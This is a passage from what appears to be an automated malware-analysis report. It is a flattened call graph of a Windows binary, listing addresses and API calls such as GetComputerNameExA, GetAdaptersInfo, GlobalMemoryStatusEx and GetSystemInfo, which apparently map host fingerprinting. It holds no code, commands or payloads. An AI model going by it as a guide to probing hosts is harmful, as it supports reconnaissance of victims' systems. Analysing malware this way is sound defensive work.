library calls 45843->46314 46315 7f2cdac0 55 API calls 3 library calls 45843->46315 46316 7f2cfd40 55 API calls 2 library calls 45843->46316 46317 7f2d1eb0 52 API calls 2 library calls 45843->46317 46318 7f2e7d90 15 API calls 2 library calls 45843->46318 46319 7f2e8870 15 API calls 2 library calls 45843->46319 46320 7f2bd6c0 32 API calls std::ios_base::clear 45843->46320 46321 7f2bd370 32 API calls std::ios_base::clear 45843->46321 46322 7f2be250 32 API calls std::ios_base::clear 45843->46322 46323 7f2b6a50 37 API calls std::ios_base::clear 45843->46323 46324 7f2b68a0 42 API calls std::ios_base::clear 45843->46324 46325 7f2bda10 44 API calls 2 library calls 45843->46325 46326 7f2be0d0 34 API calls std::ios_base::clear 45843->46326 46327 7f2b7510 GetPEB 45843->46327 46328 7f2a92e0 11 API calls std::ios_base::clear 45843->46328 45846->45843 45852->45843 45854->45843 45856->45843 45858->45843 45859->45843 45860->45843 45865->45843 45870->45843 45872->45843 45874->45843 46332 7f2ef610 GetPEB 45875->46332 45877 7f2eee33 45877->45811 45879 7f2e2725 45878->45879 46334 7f295360 45879->46334 45881 7f2e2777 46340 7f2a7700 45881->46340 45883 7f2e27af 45884 7f295360 numpunct 26 API calls 45883->45884 45885 7f2e2854 45884->45885 45885->45885 45886 7f295360 numpunct 26 API calls 45885->45886 45887 7f2e28be 45886->45887 45887->45887 45888 7f295360 numpunct 26 API calls 45887->45888 45889 7f2e2933 45888->45889 45889->45889 45890 7f295360 numpunct 26 API calls 45889->45890 45891 7f2e29ad 45890->45891 45892 7f2a7680 26 API calls 45891->45892 45893 7f2e29cd 45892->45893 45894 7f2a7680 26 API calls 45893->45894 45895 7f2e29e8 45894->45895 45896 7f2a63a0 std::ios_base::clear 26 API calls 45895->45896 45897 7f2e2a10 45896->45897 45898 7f2a63a0 std::ios_base::clear 26 API calls 45897->45898 45899 7f2e2a31 45898->45899 45900 7f2a63a0 std::ios_base::clear 26 API calls 45899->45900 45901 7f2e2a52 45900->45901 45902 7f2a63a0 std::ios_base::clear 26 API calls 45901->45902 45903 7f2e2a73 45902->45903 46343 7f2a7e60 45903->46343 45907 7f2e2a9d 46381 7f2c20f0 45907->46381 45909 7f2e2aac 45910 7f2c20f0 std::ios_base::clear 11 API calls 45909->45910 45911 7f2e2abb 45910->45911 45912 7f2c20f0 std::ios_base::clear 11 API calls 45911->45912 45913 7f2e2aca 45912->45913 45914 7f2c20f0 std::ios_base::clear 11 API calls 45913->45914 45915 7f2e2ad9 45914->45915 45916 7f2c1d30 11 API calls 45915->45916 45917 7f2ba088 45916->45917 45918 7f2a7680 45917->45918 46472 7f295a20 45918->46472 45921 7f2a8480 45922 7f2a84b8 45921->45922 46490 7f2be900 45922->46490 45925 7f2a7680 26 API calls 45926 7f2a861e 45925->45926 46493 7f2de3a0 45926->46493 45940 7f2a865a 46587 7f2daf60 45940->46587 45944 7f2a866a 46602 7f2de690 GetPEB 45944->46602 45951 7f2c1d30 11 API calls 45952 7f2a868e 45951->45952 45953 7f2c1d30 11 API calls 45952->45953 45954 7f2a869d GetTempPathW 45953->45954 45955 7f2a63a0 45954->45955 45956 7f2a641c 45955->45956 46739 7f295490 45956->46739 45958 7f2a6461 45958->45822 46747 7f293160 45959->46747 45962 7f293160 56 API calls 45963 7f2dc512 45962->45963 46752 7f2a5f50 45963->46752 45966 7f293160 56 API calls 45967 7f2dc5a3 45966->45967 46773 7f2931c0 45967->46773 45970 7f2a5f50 56 API calls 45971 7f2dc633 45970->45971 45972 7f293160 56 API calls 45971->45972 45973 7f2dc660 45972->45973 45974 7f2931c0 56 API calls 45973->45974 45975 7f2dc68c 45974->45975 45976 7f2a5f50 56 API calls 45975->45976 45977 7f2dc6f0 45976->45977 45978 7f293160 56 API calls 45977->45978 45979 7f2dc71d 45978->45979 45980 7f2931c0 56 API calls 45979->45980 45981 7f2dc749 45980->45981 45982 7f2a5f50 56 API calls 45981->45982 45983 7f2dc7ad 45982->45983 45984 7f293160 56 API calls 45983->45984 45985 7f2dc7da 45984->45985 45986 7f2931c0 56 API calls 45985->45986 45987 7f2dc806 45986->45987 45988 7f2a5f50 56 API calls 45987->45988 45989 7f2dc86a 45988->45989 45990 7f293160 56 API calls 45989->45990 45991 7f2dc897 45990->45991 45992 7f2931c0 56 API calls 45991->45992 45993 7f2dc8c6 45992->45993 45994 7f2a5f50 56 API calls 45993->45994 45995 7f2dc92a 45994->45995 45996 7f293160 56 API calls 45995->45996 45997 7f2dc957 45996->45997 45998 7f2931c0 56 API calls 45997->45998 45999 7f2dc986 45998->45999 46000 7f2a5f50 56 API calls 45999->46000 46001 7f2dc9ea 46000->46001 46002 7f293160 56 API calls 46001->46002 46003 7f2dca17 46002->46003 46004 7f2931c0 56 API calls 46003->46004 46005 7f2dca46 46004->46005 46006 7f2a5f50 56 API calls 46005->46006 46007 7f2dcaaa 46006->46007 46008 7f293160 56 API calls 46007->46008 46009 7f2dcad7 46008->46009 46010 7f2931c0 56 API calls 46009->46010 46011 7f2dcb06 46010->46011 46012 7f2a5f50 56 API calls 46011->46012 46013 7f2dcb6a 46012->46013 46014 7f293160 56 API calls 46013->46014 46015 7f2dcb97 46014->46015 46016 7f2931c0 56 API calls 46015->46016 46017 7f2dcbc6 46016->46017 46018 7f2a5f50 56 API calls 46017->46018 46019 7f2dcc2a 46018->46019 46020 7f293160 56 API calls 46019->46020 46021 7f2dcc57 46020->46021 46022 7f2931c0 56 API calls 46021->46022 46023 7f2dcc89 46022->46023 46024 7f2a5f50 56 API calls 46023->46024 46025 7f2dcced 46024->46025 46026 7f293160 56 API calls 46025->46026 46027 7f2dcd1a 46026->46027 46778 7f299610 46027->46778 46032 7f2a5f50 56 API calls 46033 7f2dcddf 46032->46033 46034 7f293160 56 API calls 46033->46034 46035 7f2dce0c 46034->46035 46036 7f2931c0 56 API calls 46035->46036 46037 7f2dce44 46036->46037 46038 7f2a5f50 56 API calls 46037->46038 46039 7f2dcea8 46038->46039 46040 7f293160 56 API calls 46039->46040 46041 7f2dcedb 46040->46041 46042 7f299610 26 API calls 46041->46042 46043 7f2dcf14 46042->46043 46044 7f293b50 56 API calls 46043->46044 46045 7f2dcf4e 46044->46045 46046 7f2a5f50 56 API calls 46045->46046 46047 7f2dcfb2 46046->46047 46048 7f293160 56 API calls 46047->46048 46049 7f2dcfe5 46048->46049 46050 7f2931c0 56 API calls 46049->46050 46051 7f2dd01d 46050->46051 46052 7f2a5f50 56 API calls 46051->46052 46053 7f2dd081 46052->46053 46054 7f293160 56 API calls 46053->46054 46055 7f2dd0b4 46054->46055 46787 7f293220 46055->46787 46058 7f2a5f50 56 API calls 46059 7f2dd150 46058->46059 46060 7f2a5f50 56 API calls 46059->46060 46061 7f2dd19c 46060->46061 46062 7f2c20f0 std::ios_base::clear 11 API calls 46061->46062 46063 7f2dd20f 46062->46063 46064 7f2c20f0 std::ios_base::clear 11 API calls 46063->46064 46065 7f2dd250 46064->46065 46792 7f2a5d30 46065->46792 46072 7f2c20f0 std::ios_base::clear 11 API calls 46073 7f2dd3a9 46072->46073 46074 7f2c20f0 std::ios_base::clear 11 API calls 46073->46074 46075 7f2dd3b5 46074->46075 46076 7f2c20f0 std::ios_base::clear 11 API calls 46075->46076 46077 7f2ba173 46076->46077 46077->45830 46079 7f2d76a3 46078->46079 46982 7f2c36a0 46079->46982 46086 7f2d7868 46088 7f2c20f0 std::ios_base::clear 11 API calls 46086->46088 46087 7f2d7740 47263 7f2e09b0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46087->47263 46090 7f2d7877 46088->46090 46091 7f2c20f0 std::ios_base::clear 11 API calls 46090->46091 46092 7f2d7882 46091->46092 46095 7f2c20f0 std::ios_base::clear 11 API calls 46092->46095 46093 7f2d7758 46094 7f2d7863 46093->46094 46096 7f2a63a0 std::ios_base::clear 26 API calls 46093->46096 46094->45843 46097 7f2d7891 46095->46097 46098 7f2d7780 46096->46098 46099 7f2c20f0 std::ios_base::clear 11 API calls 46097->46099 47264 7f2aacc0 56 API calls 4 library calls 46098->47264 46101 7f2d789c 46099->46101 47008 7f2945d0 46101->47008 46102 7f2d7792 47265 7f29d1f0 46102->47265 46107 7f2d78bd 46109 7f2d78cd 46107->46109 46110 7f2d79e2 46107->46110 46108 7f2d77da std::ios_base::clear 46114 7f2d5ec0 4 API calls 46108->46114 46111 7f2a63a0 std::ios_base::clear 26 API calls 46109->46111 47033 7f2d39c0 46110->47033 46113 7f2d78e1 46111->46113 46116 7f2945d0 56 API calls 46113->46116 46117 7f2d780d 46114->46117 46115 7f2d79f9 std::ios_base::clear 47048 7f2d5ec0 GetPEB 46115->47048 46118 7f2d790e 46116->46118 46119 7f293160 56 API calls 46117->46119 47285 7f2aa670 56 API calls 4 library calls 46118->47285 46122 7f2d782d 46119->46122 47284 7f2aacc0 56 API calls 4 library calls 46122->47284 46124 7f2d7915 46126 7f29d1f0 26 API calls 46124->46126 46125 7f2d783f 46128 7f2a9d60 56 API calls 46125->46128 46127 7f2d792d 46126->46127 46129 7f2c5a00 26 API calls 46127->46129 46130 7f2d7854 46128->46130 46132 7f2d794c std::ios_base::clear 46129->46132 46133 7f2c20f0 std::ios_base::clear 11 API calls 46130->46133 46131 7f2d7a2c 46131->46131 46134 7f295360 numpunct 26 API calls 46131->46134 46136 7f2d5ec0 4 API calls 46132->46136 46133->46094 46135 7f2d7aa7 46134->46135 46137 7f2c20f0 std::ios_base::clear 11 API calls 46135->46137 46138 7f2d797f 46136->46138 46139 7f2d7ab6 46137->46139 46140 7f293160 56 API calls 46138->46140 47052 7f2948d0 46139->47052 46142 7f2d799f 46140->46142 46144 7f2945d0 56 API calls 46142->46144 46146 7f2d79bc 46144->46146 47286 7f2aa670 56 API calls 4 library calls 46146->47286 46147 7f2d7aeb 46149 7f2c20f0 std::ios_base::clear 11 API calls 46147->46149 46150 7f2d7af6 46149->46150 46152 7f2a63a0 std::ios_base::clear 26 API calls 46150->46152 46151 7f2d79c3 46153 7f2a9d60 56 API calls 46151->46153 46154 7f2d7b0d 46152->46154 46155 7f2d79ce 46153->46155 46156 7f2a63a0 std::ios_base::clear 26 API calls 46154->46156 46157 7f2c20f0 std::ios_base::clear 11 API calls 46155->46157 46159 7f2d7b2b 46156->46159 46158 7f2d79dd 46157->46158 46158->45843 46160 7f2a63a0 std::ios_base::clear 26 API calls 46159->46160 46161 7f2d7b49 46160->46161 47062 7f2e4390 46161->47062 46163 7f2d7bc5 46164 7f2a63a0 std::ios_base::clear 26 API calls 46163->46164 46165 7f2d7bdc 46164->46165 46166 7f2a63a0 std::ios_base::clear 26 API calls 46165->46166 46169 7f2d7bfa 46166->46169 46167 7f2d7b59 std::ios_base::clear 46167->46163 47287 7f2a1cf0 GetPEB 46167->47287 46169->46169 46171 7f295360 numpunct 26 API calls 46169->46171 46170 7f2d7bb8 46170->46163 46173 7f2d843d 46170->46173 46172 7f2d7c93 46171->46172 46174 7f2e4390 92 API calls 46172->46174 46175 7f2a63a0 std::ios_base::clear 26 API calls 46173->46175 46186 7f2d7ca7 std::ios_base::clear 46174->46186 46177 7f2d8451 46175->46177 46176 7f2d7d13 46179 7f2a63a0 std::ios_base::clear 26 API calls 46176->46179 46178 7f2a63a0 std::ios_base::clear 26 API calls 46177->46178 46180 7f2d8472 46178->46180 46181 7f2d7d2a 46179->46181 47294 7f2c72d0 63 API calls 4 library calls 46180->47294 46183 7f2a63a0 std::ios_base::clear 26 API calls 46181->46183 46189 7f2d7d48 46183->46189 46184 7f2d847f 46185 7f2c20f0 std::ios_base::clear 11 API calls 46184->46185 46187 7f2d84a0 46185->46187 46186->46176 47288 7f2a1cf0 GetPEB 46186->47288 46188 7f2c20f0 std::ios_base::clear 11 API calls 46187->46188 46191 7f2d84af 46188->46191 46189->46189 46194 7f295360 numpunct 26 API calls 46189->46194 46193 7f2c20f0 std::ios_base::clear 11 API calls 46191->46193 46192 7f2d7d06 46192->46176 46199 7f2d8374 46192->46199 46195 7f2d84bb 46193->46195 46196 7f2d7dd7 46194->46196 46197 7f2c20f0 std::ios_base::clear 11 API calls 46195->46197 46198 7f2e4390 92 API calls 46196->46198 46201 7f2d84c7 46197->46201 46218 7f2d7deb std::ios_base::clear 46198->46218 46200 7f2a63a0 std::ios_base::clear 26 API calls 46199->46200 46202 7f2d8388 46200->46202 46203 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46201->46203 46205 7f2a63a0 std::ios_base::clear 26 API calls 46202->46205 46207 7f2d84d3 46203->46207 46204 7f2d7e57 46206 7f2a63a0 std::ios_base::clear 26 API calls 46204->46206 46208 7f2d83a9 46205->46208 46209 7f2d7e6e 46206->46209 46210 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46207->46210 47293 7f2c72d0 63 API calls 4 library calls 46208->47293 46212 7f2a63a0 std::ios_base::clear 26 API calls 46209->46212 46213 7f2d84e0 46210->46213 46222 7f2d7e8c 46212->46222 46215 7f2c20f0 std::ios_base::clear 11 API calls 46213->46215 46214 7f2d83b6 46216 7f2c20f0 std::ios_base::clear 11 API calls 46214->46216 46217 7f2d8294 46215->46217 46219 7f2d83d7 46216->46219 46217->45843 46218->46204 47289 7f2a1cf0 GetPEB 46218->47289 46221 7f2c20f0 std::ios_base::clear 11 API calls 46219->46221 46224 7f2d83e6 46221->46224 46222->46222 46226 7f295360 numpunct 26 API calls 46222->46226 46223 7f2d7e4a 46223->46204 46229 7f2d829c 46223->46229 46225 7f2c20f0 std::ios_base::clear 11 API calls 46224->46225 46227 7f2d83f5 46225->46227 46228 7f2d7f2e 46226->46228 46230 7f2c20f0 std::ios_base::clear 11 API calls 46227->46230 46231 7f2e4390 92 API calls 46228->46231 46233 7f2a63a0 std::ios_base::clear 26 API calls 46229->46233 46232 7f2d8401 46230->46232 46247 7f2d7f42 std::ios_base::clear 46231->46247 46234 7f2c20f0 std::ios_base::clear 11 API calls 46232->46234 46236 7f2d82b0 46233->46236 46237 7f2d840d 46234->46237 46235 7f2d7fb7 GetPEB 46251 7f2d8001 46235->46251 46238 7f2a63a0 std::ios_base::clear 26 API calls 46236->46238 46239 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46237->46239 46240 7f2d82d1 46238->46240 46241 7f2d8419 46239->46241 47292 7f2c72d0 63 API calls 4 library calls 46240->47292 46243 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46241->46243 46246 7f2d8426 46243->46246 46244 7f2d82de 46245 7f2c20f0 std::ios_base::clear 11 API calls 46244->46245 46248 7f2d82ff 46245->46248 46249 7f2c20f0 std::ios_base::clear 11 API calls 46246->46249 46247->46235 47290 7f2a1cf0 GetPEB 46247->47290 46250 7f2c20f0 std::ios_base::clear 11 API calls 46248->46250 46249->46217 46253 7f2d830e 46250->46253 46256 7f2a63a0 std::ios_base::clear 26 API calls 46251->46256 46255 7f2c20f0 std::ios_base::clear 11 API calls 46253->46255 46254 7f2d7faa 46254->46235 46254->46251 46258 7f2d831d 46255->46258 46257 7f2d81c9 46256->46257 46259 7f2a63a0 std::ios_base::clear 26 API calls 46257->46259 46260 7f2c20f0 std::ios_base::clear 11 API calls 46258->46260 46261 7f2d81ea 46259->46261 46262 7f2d832c 46260->46262 47291 7f2c72d0 63 API calls 4 library calls 46261->47291 46264 7f2c20f0 std::ios_base::clear 11 API calls 46262->46264 46266 7f2d8338 46264->46266 46265 7f2d81f7 46267 7f2c20f0 std::ios_base::clear 11 API calls 46265->46267 46268 7f2c20f0 std::ios_base::clear 11 API calls 46266->46268 46269 7f2d8218 46267->46269 46270 7f2d8344 46268->46270 46271 7f2c20f0 std::ios_base::clear 11 API calls 46269->46271 46272 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46270->46272 46273 7f2d8227 46271->46273 46274 7f2d8350 46272->46274 46275 7f2c20f0 std::ios_base::clear 11 API calls 46273->46275 46276 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46274->46276 46277 7f2d8236 46275->46277 46278 7f2d835d 46276->46278 46280 7f2c20f0 std::ios_base::clear 11 API calls 46277->46280 46279 7f2c20f0 std::ios_base::clear 11 API calls 46278->46279 46279->46217 46281 7f2d8245 46280->46281 46282 7f2c20f0 std::ios_base::clear 11 API calls 46281->46282 46283 7f2d8254 46282->46283 46284 7f2c20f0 std::ios_base::clear 11 API calls 46283->46284 46285 7f2d8260 46284->46285 46286 7f2c20f0 std::ios_base::clear 11 API calls 46285->46286 46287 7f2d826c 46286->46287 46288 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46287->46288 46289 7f2d8278 46288->46289 46290 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46289->46290 46291 7f2d8285 46290->46291 46292 7f2c20f0 std::ios_base::clear 11 API calls 46291->46292 46292->46217 46294 7f293160 56 API calls 46293->46294 46295 7f294507 46294->46295 46296 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46295->46296 46297 7f29453f 46296->46297 46298 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46297->46298 46299 7f29454c 46298->46299 46299->45843 46301 7f2a683a 46300->46301 46301->46301 46302 7f295360 numpunct 26 API calls 46301->46302 46303 7f2a6871 46302->46303 46303->45843 46305 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46304->46305 46306 7f2a9d71 46305->46306 46307 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46306->46307 46308 7f2a9df3 46307->46308 46309 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46308->46309 46310 7f2a9e01 46309->46310 46311 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46310->46311 46312 7f2a9e0e GetPEB 46311->46312 46312->45843 46313->45843 46314->45843 46315->45843 46316->45843 46317->45843 46318->45843 46319->45843 46320->45843 46321->45843 46322->45843 46323->45843 46324->45843 46325->45843 46326->45843 46327->45843 46328->45843 46329->45837 46330->45839 46331->45841 46333 7f2ef62b _memcpy_s 46332->46333 46333->45877 46335 7f295377 numpunct 46334->46335 46337 7f295381 numpunct 46335->46337 46385 7f2c23f0 15 API calls numpunct 46335->46385 46338 7f29539a ctype 46337->46338 46386 7f2949f0 14 API calls 2 library calls 46337->46386 46338->45881 46387 7f295980 46340->46387 46344 7f2a7e9b 46343->46344 46345 7f295360 numpunct 26 API calls 46344->46345 46346 7f2a7f96 46345->46346 46346->46346 46347 7f295360 numpunct 26 API calls 46346->46347 46348 7f2a800f 46347->46348 46349 7f295360 numpunct 26 API calls 46348->46349 46350 7f2a80af 46349->46350 46351 7f2a7700 26 API calls 46350->46351 46352 7f2a80e7 46351->46352 46440 7f2a9e80 46352->46440 46355 7f2a9e80 26 API calls 46356 7f2a811e 46355->46356 46357 7f2a9e80 26 API calls 46356->46357 46358 7f2a812d 46357->46358 46359 7f2a9e80 26 API calls 46358->46359 46363 7f2a813c Concurrency::cancellation_token_source::~cancellation_token_source 46359->46363 46360 7f2a823c 46362 7f2c20f0 std::ios_base::clear 11 API calls 46360->46362 46361 7f2a63a0 std::ios_base::clear 26 API calls 46361->46363 46364 7f2a8248 46362->46364 46363->46360 46363->46361 46369 7f2c20f0 std::ios_base::clear 11 API calls 46363->46369 46444 7f296010 46363->46444 46365 7f2c20f0 std::ios_base::clear 11 API calls 46364->46365 46367 7f2a8254 46365->46367 46368 7f2c20f0 std::ios_base::clear 11 API calls 46367->46368 46370 7f2a8260 46368->46370 46369->46363 46371 7f2c20f0 std::ios_base::clear 11 API calls 46370->46371 46372 7f2a826c 46371->46372 46373 7f2c1d30 11 API calls 46372->46373 46374 7f2a827b 46373->46374 46375 7f2c1d30 46374->46375 46380 7f2c1d7e 46375->46380 46376 7f2c1da4 46377 7f2c1dda std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46376->46377 46470 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46376->46470 46377->45907 46380->46376 46469 7f2990d0 11 API calls 3 library calls 46380->46469 46382 7f2c211d 46381->46382 46384 7f2c2184 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46382->46384 46471 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46382->46471 46384->45909 46385->46337 46386->46338 46394 7f294ae0 46387->46394 46395 7f294b06 46394->46395 46396 7f294b0b 46394->46396 46405 7f294f20 46395->46405 46398 7f294b77 46396->46398 46414 7f2c2df0 46396->46414 46397 7f294c95 46423 7f2a8c30 46397->46423 46398->46397 46401 7f2c2df0 14 API calls 46398->46401 46404 7f2a63a0 std::ios_base::clear 26 API calls 46398->46404 46401->46398 46403 7f2a63a0 std::ios_base::clear 26 API calls 46403->46398 46404->46398 46406 7f2c2df0 14 API calls 46405->46406 46407 7f294f6e 46406->46407 46408 7f2a8c30 11 API calls 46407->46408 46409 7f29510e 46408->46409 46410 7f2a8e60 46409->46410 46411 7f295a06 46410->46411 46412 7f2a8e77 46410->46412 46411->45883 46412->46411 46439 7f2990d0 11 API calls 3 library calls 46412->46439 46415 7f2c2e0d 46414->46415 46416 7f2c2e12 46414->46416 46427 7f2c1a70 RaiseException CallUnexpected Concurrency::cancel_current_task 46415->46427 46418 7f2c2e24 46416->46418 46419 7f2c2e35 46416->46419 46428 7f294a70 14 API calls 3 library calls 46418->46428 46420 7f294b45 46419->46420 46429 7f2f07db 46419->46429 46420->46403 46424 7f2a8c57 46423->46424 46425 7f2a8c96 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46423->46425 46424->46425 46438 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46424->46438 46425->46395 46427->46416 46428->46420 46432 7f2f07e0 _Yarn 46429->46432 46430 7f2f07fa 46430->46420 46432->46430 46433 7f2f07fc Concurrency::cancel_current_task 46432->46433 46436 7f300396 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 46432->46436 46437 7f2f1ac5 RaiseException 46433->46437 46435 7f2f1401 46436->46432 46437->46435 46438->46425 46439->46412 46441 7f2a9e9c 46440->46441 46443 7f2a8112 46440->46443 46452 7f2c3290 46441->46452 46443->46355 46445 7f29604a 46444->46445 46446 7f296080 46445->46446 46468 7f2efba8 15 API calls 2 library calls 46445->46468 46457 7f293710 46446->46457 46449 7f2960ae 46462 7f2a8e00 46449->46462 46453 7f2c32a4 std::ios_base::clear 46452->46453 46454 7f2c32e0 46452->46454 46453->46443 46456 7f299980 26 API calls 4 library calls 46454->46456 46456->46453 46458 7f2c2df0 14 API calls 46457->46458 46459 7f29375d 46458->46459 46460 7f2a63a0 std::ios_base::clear 26 API calls 46459->46460 46461 7f29379b 46460->46461 46461->46449 46463 7f2a8e34 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46462->46463 46464 7f2a8e12 46462->46464 46466 7f2a8c30 11 API calls 46463->46466 46465 7f2c20f0 std::ios_base::clear 11 API calls 46464->46465 46465->46463 46467 7f2960d2 46466->46467 46467->46363 46469->46380 46470->46377 46471->46384 46479 7f294cc0 46472->46479 46475 7f294f20 14 API calls 46476 7f295a97 46475->46476 46477 7f2a8e60 11 API calls 46476->46477 46478 7f295aa6 46477->46478 46478->45921 46481 7f294ce9 46479->46481 46480 7f294d07 46480->46475 46481->46480 46482 7f2c2df0 14 API calls 46481->46482 46483 7f294d84 46481->46483 46484 7f294d46 46482->46484 46486 7f294efa 46483->46486 46487 7f2c2df0 14 API calls 46483->46487 46489 7f2a63a0 std::ios_base::clear 26 API calls 46483->46489 46485 7f2a63a0 std::ios_base::clear 26 API calls 46484->46485 46485->46483 46488 7f2a8c30 11 API calls 46486->46488 46487->46483 46488->46480 46489->46483 46491 7f2c2df0 14 API calls 46490->46491 46492 7f2a860e 46491->46492 46492->45925 46495 7f2de3c3 46493->46495 46494 7f2de3f2 GetPEB 46496 7f2de431 46494->46496 46495->46494 46654 7f2a1f00 46496->46654 46499 7f2de5be 46501 7f2c3290 26 API calls 46499->46501 46500 7f2de623 46502 7f2c3290 26 API calls 46500->46502 46503 7f2a862a 46501->46503 46502->46503 46504 7f2d9a90 GetPEB 46503->46504 46505 7f2d9adf 46504->46505 46506 7f2d9c50 46505->46506 46507 7f2d9ca9 46505->46507 46506->46506 46509 7f2c3290 26 API calls 46506->46509 46507->46507 46508 7f2c3290 26 API calls 46507->46508 46510 7f2a8632 46508->46510 46509->46510 46511 7f2dd3e0 GetPEB 46510->46511 46512 7f2dd546 46511->46512 46513 7f2dd99d GetPEB 46512->46513 46514 7f2dd77e GetPEB 46512->46514 46515 7f2dda0b 46513->46515 46519 7f2dd7b4 46514->46519 46516 7f2ddc24 GetPEB 46515->46516 46515->46519 46516->46519 46517 7f2dde34 GetPEB 46520 7f2dde73 46517->46520 46519->46517 46519->46520 46521 7f2de06f 46520->46521 46659 7f2f1ac5 RaiseException 46520->46659 46522 7f2c3290 26 API calls 46521->46522 46524 7f2de103 46522->46524 46523 7f2a863a 46526 7f2dc170 46523->46526 46524->46523 46524->46524 46525 7f2c3290 26 API calls 46524->46525 46525->46523 46660 7f2a2050 46526->46660 46530 7f2dc1d2 46531 7f2dc349 46530->46531 46532 7f2dc3a8 46530->46532 46535 7f2c3290 26 API calls 46531->46535 46664 7f2ee9e0 36 API calls 2 library calls 46532->46664 46534 7f2dc3b9 46537 7f2c3290 26 API calls 46534->46537 46536 7f2a8642 46535->46536 46538 7f2d9d20 46536->46538 46537->46536 46666 7f2df830 46538->46666 46541 7f2d9d42 46542 7f2c3290 26 API calls 46541->46542 46552 7f2a864a 46542->46552 46543 7f2d9daf 46544 7f2da12b 46543->46544 46545 7f2d9f4b 46543->46545 46546 7f2da169 46544->46546 46547 7f2da1d1 46544->46547 46569 7f2da1cc 46544->46569 46690 7f2a1f30 GetPEB 46545->46690 46549 7f2c3290 26 API calls 46546->46549 46686 7f2a1d20 46547->46686 46549->46569 46570 7f2da560 46552->46570 46553 7f2da0be 46555 7f2c3290 26 API calls 46553->46555 46555->46552 46557 7f2da2f3 46692 7f2c2420 46557->46692 46561 7f2da327 46701 7f2ee9e0 36 API calls 2 library calls 46561->46701 46563 7f2da33a 46564 7f2c3290 26 API calls 46563->46564 46565 7f2da39e 46564->46565 46702 7f2c2a20 GetPEB GetPEB 46565->46702 46567 7f2da3a7 46703 7f2a1fc0 GetPEB 46567->46703 46704 7f2a1f30 GetPEB 46569->46704 46572 7f2da583 46570->46572 46571 7f2da5b2 GetPEB 46573 7f2da5fe 46571->46573 46572->46571 46574 7f2c3290 26 API calls 46573->46574 46575 7f2da830 46573->46575 46574->46575 46576 7f2da84e GetPEB 46575->46576 46577 7f2da8a5 46576->46577 46578 7f2daa75 GetPEB 46577->46578 46579 7f2daaa9 46577->46579 46578->46579 46580 7f2c3290 26 API calls 46579->46580 46581 7f2dad02 46580->46581 46582 7f2a8652 46581->46582 46583 7f2c3290 26 API calls 46581->46583 46584 7f2dadb0 GetPEB 46582->46584 46583->46582 46586 7f2daded GetSystemInfo 46584->46586 46586->45940 46589 7f2daf83 46587->46589 46588 7f2dafb2 GetPEB 46590 7f2daff1 46588->46590 46589->46588 46591 7f2a1f00 GetPEB 46590->46591 46592 7f2db174 46591->46592 46593 7f2db17e 46592->46593 46594 7f2db1e6 46592->46594 46595 7f2c3290 26 API calls 46593->46595 46596 7f2c3290 26 API calls 46594->46596 46597 7f2a8662 46595->46597 46596->46597 46598 7f2de1c0 GetPEB 46597->46598 46601 7f2de207 GlobalMemoryStatusEx 46598->46601 46600 7f2de37e __aulldiv 46600->45944 46601->46600 46604 7f2de6f0 GetComputerNameExA 46602->46604 46605 7f2de86a 46604->46605 46606 7f2de8d5 46604->46606 46609 7f2c3290 26 API calls 46605->46609 46607 7f2a1f00 GetPEB 46606->46607 46608 7f2de8e5 46607->46608 46611 7f2de8ef 46608->46611 46612 7f2de957 46608->46612 46610 7f2a8672 46609->46610 46615 7f2db260 46610->46615 46613 7f2c3290 26 API calls 46611->46613 46614 7f2c3290 26 API calls 46612->46614 46613->46610 46614->46610 46730 7f2f0cc0 46615->46730 46619 7f2db85e 46622 7f2db886 GetPEB 46619->46622 46620 7f2db4d0 46623 7f2db4ee GetPEB 46620->46623 46621 7f2db2e1 GetAdaptersInfo 46621->46619 46621->46620 46624 7f2db8ed 46622->46624 46625 7f2db5d7 46623->46625 46627 7f2dbafa GetPEB 46624->46627 46625->46625 46626 7f2c3290 26 API calls 46625->46626 46628 7f2a867a 46626->46628 46629 7f2dbb60 46627->46629 46647 7f2dc430 46628->46647 46630 7f2dbd94 GetPEB 46629->46630 46631 7f2dbdfb 46630->46631 46732 7f2a1e70 GetPEB 46631->46732 46633 7f2dbff7 46733 7f2a1c30 GetPEB 46633->46733 46635 7f2dc031 46734 7f2a1c30 GetPEB 46635->46734 46637 7f2dc04d 46735 7f2a1c30 GetPEB 46637->46735 46639 7f2dc087 46736 7f2a1c30 GetPEB 46639->46736 46641 7f2dc0a3 46737 7f2a1c30 GetPEB 46641->46737 46643 7f2dc0dd 46738 7f2ee9e0 36 API calls 2 library calls 46643->46738 46645 7f2dc0f3 46646 7f2c3290 26 API calls 46645->46646 46646->46628 46648 7f2a67d0 numpunct 26 API calls 46647->46648 46649 7f2dc45b 46648->46649 46650 7f296010 26 API calls 46649->46650 46651 7f2dc47f 46650->46651 46652 7f2c20f0 std::ios_base::clear 11 API calls 46651->46652 46653 7f2a8682 46652->46653 46653->45951 46655 7f2a1f0c 46654->46655 46656 7f2a1f1e 46654->46656 46658 7f2ded70 GetPEB 46655->46658 46656->46499 46656->46500 46658->46656 46659->46521 46661 7f2a205c 46660->46661 46662 7f2a206e GetPEB 46660->46662 46665 